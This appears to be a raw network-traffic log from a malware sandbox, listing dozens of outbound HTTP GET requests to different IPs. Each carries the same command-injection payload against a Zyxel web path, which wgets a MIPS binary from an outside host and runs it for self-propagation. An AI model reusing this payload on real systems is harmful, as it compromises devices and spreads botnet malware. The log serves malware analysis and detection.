                                                Jan 28, 2024 10:16:28.863830090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5185192.168.2.235367468.242.47.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.863856077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5186192.168.2.234749265.58.65.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.863876104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5187192.168.2.235675637.249.29.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.863898993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5188192.168.2.233437094.181.52.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.863919020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5189192.168.2.2336888164.205.252.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.863951921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5190192.168.2.2348782178.169.33.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.863960981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5191192.168.2.2359616172.141.58.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.863982916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5192192.168.2.235432487.67.71.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.864006996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5193192.168.2.235093850.31.241.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.864027023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5194192.168.2.2333524146.229.95.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.864064932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5195192.168.2.2357284119.226.72.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.864092112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5196192.168.2.234990041.179.227.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.864098072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5197192.168.2.2338034149.136.60.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.864135027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5198192.168.2.235941683.82.82.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.864187002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5199192.168.2.233996844.74.202.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.864207029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5200192.168.2.233334283.124.53.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.864238977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5201192.168.2.2357730179.139.220.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.864269018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5202192.168.2.2335014197.91.68.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.864289045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5203192.168.2.2360180216.125.194.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.864325047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5204192.168.2.2359688222.26.159.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.864339113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5205192.168.2.2344134201.150.84.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.864362955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5206192.168.2.235029248.14.151.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.864392996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5207192.168.2.2355458107.40.158.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.864425898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5208192.168.2.2352142180.180.152.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.864445925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5209192.168.2.235329044.87.41.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.864464045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5210192.168.2.2359084151.207.230.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.864490032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5211192.168.2.2358068213.127.95.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.864525080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5212192.168.2.233368291.46.190.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.864562035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5213192.168.2.2347246152.171.227.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.864588022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5214192.168.2.235912080.170.32.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.864619017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5215192.168.2.233304291.60.252.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.864655972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5216192.168.2.2342382116.187.195.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.864680052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5217192.168.2.233793427.126.215.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.864691973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5218192.168.2.2337316143.162.34.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.864743948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5219192.168.2.23462748.177.139.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.864761114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5220192.168.2.2352642101.253.235.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.864784956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5221192.168.2.234563852.150.194.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.864798069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5222192.168.2.2359012181.32.121.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.864828110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5223192.168.2.2345628135.245.147.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.864860058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5224192.168.2.233584097.213.31.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.864885092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5225192.168.2.2359908153.122.115.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.864953041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5226192.168.2.2341276135.248.109.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.864974976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5227192.168.2.234190092.70.140.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.864998102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5228192.168.2.2349710175.98.243.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.865031004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5229192.168.2.2356234125.179.162.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.865052938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5230192.168.2.236098086.48.67.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.865094900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5231192.168.2.2346656197.126.119.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.865115881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5232192.168.2.236054869.33.170.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.865138054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5233192.168.2.234136813.43.209.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.865154028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5234192.168.2.2352266209.204.136.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.865183115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5235192.168.2.234010232.171.99.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.865201950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5236192.168.2.2351478134.178.45.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.865225077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5237192.168.2.2355974189.218.210.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.865258932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5238192.168.2.234385283.83.72.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.865283012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5239192.168.2.2333486157.162.184.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.865293980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5240192.168.2.23522684.127.81.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.865309000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5241192.168.2.2339658204.118.96.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.865319014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5242192.168.2.2349636185.237.8.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.865345955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5243192.168.2.235906890.89.26.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.865447998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5244192.168.2.2340522166.80.181.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.865463972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5245192.168.2.23416901.145.142.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.865524054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5246192.168.2.2343888148.200.116.245443
                                                TimestampBytes transferredDirectionData
